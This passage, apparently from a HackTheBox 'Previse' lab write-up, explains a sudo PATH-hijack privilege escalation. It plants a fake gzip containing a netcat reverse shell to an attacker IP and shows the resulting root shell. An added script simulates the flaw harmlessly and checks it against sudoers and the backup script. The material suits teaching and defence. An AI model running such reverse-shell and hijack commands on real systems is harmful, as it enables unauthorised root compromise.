Path Hijacking
As discovered previously, the m4lwhere user is able to execute a command as the root user with sudo privileges. However, the sudoers configuration sets no environment restriction for the m4lwhere user (nothing that pins PATH the way a secure_path setting would), so the user's own environment variables, including PATH, are passed through to the command run via sudo.
m4lwhere@previse:~$ export PATH=/dev/shm:$PATH
I can just prepend an arbitrary directory, /dev/shm, to the existing $PATH variable. /dev/shm is world-writable, so anything can be dropped there.
m4lwhere@previse:~$ echo $PATH
/dev/shm:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
Now that the $PATH variable has been updated, the shell searches those directories in this order whenever a command is invoked by bare name; /dev/shm is now checked first, before any of the system directories.
m4lwhere@previse:~$ echo 'nc 10.10.14.7 1234 -e /bin/bash' > /dev/shm/gzip ; chmod 777 /dev/shm/gzip
Then I can create a fake gzip in /dev/shm that contains a reverse shell command to the Netcat listener on Kali. This works because access_backup.sh invokes gzip by its bare name rather than by absolute path, so the lookup lands on /dev/shm/gzip before /bin/gzip. The file only needs to be executable; 777 is more than necessary, 755 would do.
m4lwhere@previse:~$ sudo /opt/scripts/access_backup.sh
Executing the sudo command runs the script as root with my PATH, so the fake gzip executes as root and connects back to the listener.
┌──(kali㉿kali)-[~/archive/htb/labs/previse]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.11.104] 49556
whoami
root
hostname
previse
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.11.104 netmask 255.255.254.0 broadcast 10.10.11.255
inet6 dead:beef::250:56ff:feb9:3246 prefixlen 64 scopeid 0x0<global>
inet6 fe80::250:56ff:feb9:3246 prefixlen 64 scopeid 0x20<link>
ether 00:50:56:b9:32:46 txqueuelen 1000 (Ethernet)
RX packets 1949341 bytes 242782351 (242.7 MB)
RX errors 0 dropped 31 overruns 0 frame 0
TX packets 1618257 bytes 805823597 (805.8 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 18046 bytes 1508751 (1.5 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 18046 bytes 1508751 (1.5 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
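As an added example that is not part of the original write-up, the script below reproduces the mechanism behind this escalation without root and without touching the real box: a constructed stand-in for /opt/scripts/access_backup.sh calls gzip by bare name, a constructed "system" directory holds the legitimate gzip, and a constructed writable directory (standing in for /dev/shm) holds the hijacking gzip. It then runs two checks a defender would want: whether a sudoers file pins PATH with secure_path, and which commands a privileged script invokes by bare name. All directories, stub scripts and the two sudoers fragments are constructed here and are not the machine's real files.

```shell
#!/bin/sh
# Added example (not from the original write-up): simulate the PATH hijack
# against a sudo-run script that calls gzip by bare name, then run two checks.
set -eu

LAB=$(mktemp -d)
trap 'rm -rf "$LAB"' EXIT
SYSBIN="$LAB/usrbin"   # constructed stand-in for /usr/bin
HIJACK="$LAB/shm"      # constructed stand-in for the world-writable /dev/shm
mkdir -p "$SYSBIN" "$HIJACK"

# Constructed stand-in for the legitimate gzip.
printf '#!/bin/sh\necho real-gzip\n' > "$SYSBIN/gzip"
chmod 755 "$SYSBIN/gzip"

# Constructed stand-in for access_backup.sh: invokes gzip by bare name (the flaw).
TARGET="$LAB/access_backup.sh"
printf '#!/bin/sh\ngzip\n' > "$TARGET"
chmod 755 "$TARGET"

# Attacker's fake gzip in the writable directory (stands in for the reverse shell).
printf '#!/bin/sh\necho hijacked-gzip\n' > "$HIJACK/gzip"
chmod 755 "$HIJACK/gzip"

# Constructed sudoers fragments: one that pins PATH, one that does not.
printf 'Defaults env_reset\nDefaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"\n' > "$LAB/sudoers.good"
printf 'Defaults env_reset\nm4lwhere ALL=(root) /opt/scripts/access_backup.sh\n' > "$LAB/sudoers.weak"

# Which file runs for a command name under a given PATH: first directory wins.
resolve_cmd() {   # $1 = PATH value, $2 = command name
    PATH="$1" command -v "$2"
}

# Run the target script under a given PATH and report which gzip executed.
run_target() {    # $1 = PATH value
    PATH="$1" "$TARGET"
}

# Check 1: does the sudoers file set secure_path (PATH is replaced, not inherited)?
sudoers_has_secure_path() {   # $1 = sudoers file; exit 0 if pinned
    grep -Eq '^[[:space:]]*Defaults[^#]*secure_path[[:space:]]*=' "$1"
}

# Check 2: rough list of commands a script invokes by bare name (first token of
# each non-comment line that is not an absolute path). Heuristic, not a parser.
bare_commands() { # $1 = script
    grep -vE '^[[:space:]]*(#|$)' "$1" | grep -vE '^[[:space:]]*/' | awk '{print $1}' | sort -u
}

echo "system PATH  : $(run_target "$SYSBIN")"
echo "hijacked PATH: $(run_target "$HIJACK:$SYSBIN") (via $(resolve_cmd "$HIJACK:$SYSBIN" gzip))"
echo "bare-name commands in target: $(bare_commands "$TARGET")"
for f in "$LAB/sudoers.good" "$LAB/sudoers.weak"; do
    if sudoers_has_secure_path "$f"; then echo "$f: PATH pinned"; else echo "$f: PATH inherited"; fi
done
```

The two checks are the fix and the detection in one place: either secure_path in sudoers (the default on most distributions) or absolute paths inside the privileged script closes this hole, and a script that passes bare_commands clean is immune to the hijack regardless of what sudoers says.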
System Level Compromise